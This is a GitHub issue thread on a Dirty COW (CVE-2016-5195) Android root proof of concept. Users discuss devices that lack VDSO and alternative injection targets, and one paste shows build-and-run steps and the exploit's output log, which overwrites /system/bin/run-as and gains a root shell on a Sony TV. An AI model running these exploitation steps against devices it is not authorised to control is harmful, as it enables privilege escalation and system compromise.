search

hyln9 / VIKIROOT

CVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow
GNU General Public License v3.0
266 stars 96 forks source link

Devices without VDSO #2

Closed ghost closed 7 years ago

ghost commented 7 years ago

Most armv7a (non-64bit) devices do not have VDSO enabled. Any suggestions on what might be the other places to inject?

jorymorrison commented 7 years ago

Wondering this as well, trying a Sony XBR700d.

coretechsystems commented 7 years ago

Well unless we can find a different exploitable program that runs in the device's memory, I don't think the dev will bother. I was thinking we could try exploiting wpa_supplicant, but I don't think that runs in RAM so it wouldn't fit this exploit.

jorymorrison commented 7 years ago

I have heard talk on XDA regarding using wpa_supplicant but didn't have time to dig through the entire thread. https://forum.xda-developers.com/general/security/dirty-cow-t3484879 When you say you don't think it runs in ram, what do you mean? Isn't every running process going to be in memory?

I'm not sure what device you are looking at but I am thinking my best bet will be looking at some of the custom stuff Sony might have added into my TV's OS.

coretechsystems commented 7 years ago

Not EVERY process is running in memory at the same time. wpa_supplicant should be running in the background, provided WiFi is turned on.

alexbel commented 7 years ago

@jorymorrison any luck with Sony XBR700d?

jorymorrison commented 7 years ago

@alexbel https://github.com/Arinerron/CVE-2016-5195/

Enable debugging on your TV.

Clone, edit Makefile to point to your NDK binary, run make root. 

[gp100@localhost CVE-2016-5195]$ make root
~/android-ndk/ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23
make[1]: Entering directory '/home/gp100/CVE-2016-5195'
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
make[1]: Leaving directory '/home/gp100/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17912) differ

[*] size 5544
[*] mmap 0xb6d6a000
[*] currently 0xb6d6a000=464c457f
[*] madvise = 0xb6d6a000 5544
[*] /proc/self/mem 7306992 1318
[*] madvise = 0 32615
[*] exploited 0xb6d6a000=464c457f
adb shell /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@BRAVIA_ATV2:/ #

The problem with this is our context 0 u:r:runas:s0 won't allow us to disable selinux and do anything useful with the shell. That's where most people are focusing their energy.

alexbel commented 7 years ago

@jorymorrison yeah, I've tried this version https://github.com/timwr/CVE-2016-5195 (original repo). It doesn't allow us to remount /system as rw. Without writable /system we can't do much